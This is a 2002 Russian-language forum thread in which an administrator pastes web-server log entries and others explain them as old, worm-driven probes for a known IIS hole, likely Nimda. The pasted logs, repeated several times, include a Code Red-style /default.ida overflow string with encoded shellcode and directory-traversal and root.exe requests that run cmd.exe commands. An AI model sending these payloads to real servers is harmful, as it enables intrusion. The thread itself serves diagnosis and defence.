forum.opennet.ru - "Что за сообщения? Может хакеры?" (4)

форумы

помощь

поиск

регистрация

майллист

ВХОД

слежка

"Что за сообщения? Может хакеры?"

Форумы OpenNET: Виртуальная конференция (Public)
Вариант для распечатки		Архивированная нить - только для чтения! Пред. тема \| След. тема
Изначальное сообщение		[Проследить за развитием треда]

"Что за сообщения? Может хакеры?"
Сообщение от Сергей on 11-Июн-02, 19:26 (MSK)
63.72.173.44 - - [08/Jun/2002:12:56:18 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-" 198.173.11.68 - - [08/Jun/2002:18:19:44 +0000] "GET x HTTP/1.0" 400 327 "-" "-" 206.67.31.26 - - [08/Jun/2002:18:55:23 +0000] "GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" 213.23.43.129 - - [08/Jun/2002:21:34:10 +0000] "GET http://213.23.43.129:8283/ HTTP/1.0" 200 1456 "-" "-" 24.49.100.206 - - [09/Jun/2002:09:28:24 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-" 61.142.137.2 - - [09/Jun/2002:09:41:35 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-" 212.163.158.111 - - [09/Jun/2002:13:44:46 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-" 61.221.6.251 - - [09/Jun/2002:23:54:50 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" "-" 213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-" 213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-" 213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-" 213.44.233.115 - - [10/Jun/2002:01:18:32 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
	Рекомендовать в FAQ \| Cообщить модератору \| Наверх

Оглавление

RE: Что за сообщения? Может хакеры?, lavr, 19:39 , 11-Июн-02, (1)
- Значит они пытаются найти Виндоусный сервер?, Сергей, 19:49 , 11-Июн-02, (2)
  - RE: Значит они пытаются найти Виндоусный сервер?, Dawnshade, 10:11 , 13-Июн-02, (3)
    - RE: Значит они пытаются найти Виндоусный сервер?, Mikka, 22:46 , 16-Июн-02, (4)

Индекс форумов | Темы | Пред. тема | След. тема

Сообщения по теме

1. "RE: Что за сообщения? Может хакеры?"

Сообщение от lavr on 11-Июн-02, 19:39  (MSK)

>63.72.173.44 - - [08/Jun/2002:12:56:18 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-"
>"-"
>198.173.11.68 - - [08/Jun/2002:18:19:44 +0000] "GET x HTTP/1.0" 400 327 "-" "-"
>
>206.67.31.26 - - [08/Jun/2002:18:55:23 +0000] "GET /scripts/..\\../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
>213.23.43.129 - - [08/Jun/2002:21:34:10 +0000] "GET http://213.23.43.129:8283/ HTTP/1.0" 200 1456 "-" "-"
>
>24.49.100.206 - - [09/Jun/2002:09:28:24 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-"
>"-"
>61.142.137.2 - - [09/Jun/2002:09:41:35 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-"
>"-"
>212.163.158.111 - - [09/Jun/2002:13:44:46 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-"
>"-"
>61.221.6.251 - - [09/Jun/2002:23:54:50 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-"
>"-"
>213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
>
>213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
>
>213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
>
>213.44.233.115 - - [10/Jun/2002:01:18:32 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
>
устарело, попытка использовать известную дыру IIS:
GET /scripts/root.exe?/c+dir...
GET /c/winnt/system32/cmd.exe?/c+dir...

Рекомендовать в FAQ | Cообщить модератору | Наверх

2. "Значит они пытаются найти Виндоусный сервер?"

Сообщение от Сергей on 11-Июн-02, 19:49  (MSK)

А можно ли написать им какой нибудь ответ, при попытке поиска подобных вещей?

Рекомендовать в FAQ | Cообщить модератору | Наверх

3. "RE: Значит они пытаются найти Виндоусный сервер?"

Сообщение от Dawnshade on 13-Июн-02, 10:11  (MSK)

>А можно ли написать им какой нибудь ответ, при попытке поиска подобных
>вещей?

А им по фиг, он в танке. Это самораспространяющаяся зараза. Админ даже не знает, что у него такая фигня твориться.

Рекомендовать в FAQ | Cообщить модератору | Наверх

4. "RE: Значит они пытаются найти Виндоусный сервер?"

Сообщение от Mikka on 16-Июн-02, 22:46  (MSK)

Да к тому же скорее всего это и не хакеры даже, а вирус типа нимды, она как раз эту дырку использует.

Рекомендовать в FAQ | Cообщить модератору | Наверх

Удалить

Индекс форумов | Темы | Пред. тема | След. тема

Пожалуйста, прежде чем написать сообщение, ознакомьтесь с данными рекомендациями.

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "RE: Что за сообщения? Может хакеры?"
Сообщение от lavr on 11-Июн-02, 19:39 (MSK)
>63.72.173.44 - - [08/Jun/2002:12:56:18 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" >"-" >198.173.11.68 - - [08/Jun/2002:18:19:44 +0000] "GET x HTTP/1.0" 400 327 "-" "-" > >206.67.31.26 - - [08/Jun/2002:18:55:23 +0000] "GET /scripts/..\\../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" >213.23.43.129 - - [08/Jun/2002:21:34:10 +0000] "GET http://213.23.43.129:8283/ HTTP/1.0" 200 1456 "-" "-" > >24.49.100.206 - - [09/Jun/2002:09:28:24 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" >"-" >61.142.137.2 - - [09/Jun/2002:09:41:35 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" >"-" >212.163.158.111 - - [09/Jun/2002:13:44:46 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" >"-" >61.221.6.251 - - [09/Jun/2002:23:54:50 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 323 "-" >"-" >213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-" > >213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-" > >213.44.233.115 - - [10/Jun/2002:01:18:31 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-" > >213.44.233.115 - - [10/Jun/2002:01:18:32 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-" > устарело, попытка использовать известную дыру IIS: GET /scripts/root.exe?/c+dir... GET /c/winnt/system32/cmd.exe?/c+dir...
	Рекомендовать в FAQ \| Cообщить модератору \| Наверх


	2. "Значит они пытаются найти Виндоусный сервер?"
	Сообщение от Сергей on 11-Июн-02, 19:49 (MSK)
	А можно ли написать им какой нибудь ответ, при попытке поиска подобных вещей?
		Рекомендовать в FAQ \| Cообщить модератору \| Наверх


	3. "RE: Значит они пытаются найти Виндоусный сервер?"
	Сообщение от Dawnshade on 13-Июн-02, 10:11 (MSK)
	>А можно ли написать им какой нибудь ответ, при попытке поиска подобных >вещей? А им по фиг, он в танке. Это самораспространяющаяся зараза. Админ даже не знает, что у него такая фигня твориться.
		Рекомендовать в FAQ \| Cообщить модератору \| Наверх


	4. "RE: Значит они пытаются найти Виндоусный сервер?"
	Сообщение от Mikka on 16-Июн-02, 22:46 (MSK)
	Да к тому же скорее всего это и не хакеры даже, а вирус типа нимды, она как раз эту дырку использует.
		Рекомендовать в FAQ \| Cообщить модератору \| Наверх